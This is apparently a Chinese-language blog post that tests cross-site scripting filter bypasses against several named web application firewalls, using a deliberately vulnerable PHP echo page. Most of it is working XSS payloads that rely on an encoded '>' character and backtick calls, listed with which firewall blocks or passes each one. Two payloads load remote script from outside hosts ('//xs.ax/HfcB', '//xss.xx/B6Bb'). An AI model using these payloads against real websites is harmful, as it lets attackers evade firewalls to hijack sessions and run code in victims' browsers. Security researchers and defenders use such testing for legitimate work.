360主机卫士是360旗下的服务器安全软件,为站长免费提供网站后门检测、木马查杀,网站补丁、漏洞防护等服务...
(虽然软件几年前就停止更新,官网挂了,但是从当时的评论上看软件还是很不错的。)
火狐
360主机卫士Apache版
phpStudy2016(PHP-5.4.45+Apache)
测试代码
<?php
$input = @$_REQUEST["xss"];
echo "<div>".$input."</div>"
?>
习惯性的直接上 Burp 用平时收集的 payload fuzz 一遍,结果不怎么理想,能过的很鸡肋...然后我就去网上找资料,找到了一篇文章xss加入某些字符即可过大多数waf的思路及一些思考根据里面的思路可以绕过。
<svg onload>
拦截
<svg > onload>
不拦截
具体绕过就是先把 >
html实体编码
将 >
URL编码
大部分 xss payload
加上 %26%2362
即可绕过,但是类似 alert(1) 括号可能会被拦截 可以用反引号替换
<svg %26%2362 onload=alert`1`>
给几个测试绕过的 payload
<style %26%2362 onload=alert`1`>
<img %26%2362 src=1 onerror=alert`1`>
<audio %26%2362 src=x onerror=alert`1`>
<svg %26%2362 onload=appendChild(createElement('script')).src='//xs.ax/HfcB'>
该文章在最后说明此方法可以绕过多款waf,接下来我们来测试。
云锁
:
绕过
<svg %26%2362 onload=alert`1`>
奇安信CDN
:
拦截
<svg %26%2362 onload=alert`1`>
绕过方法(使用HTML5新标签)
<select autofocus onfocus=[2].find(alert)>
安全狗
:
绕过
阿里云
:
拦截
绕过方法(这个百度下就有)
<img src=# onerror=alert`2`>
<input onfocus="document.body.appendChild(createElement('script')).src='//xss.xx/B6Bb'" autofocus>
百度云加速
:
绕过
此次利用 >
字符的编码绕过的姿势,再到其他 waf 测试到此结束,至于其他特殊字符是否也有绕过,感兴趣的可以研究下,如有错误之处,请师傅指正。
(文笔尚浅,内容浅显,不足之处欢迎师傅们指点和纠正,感激不尽)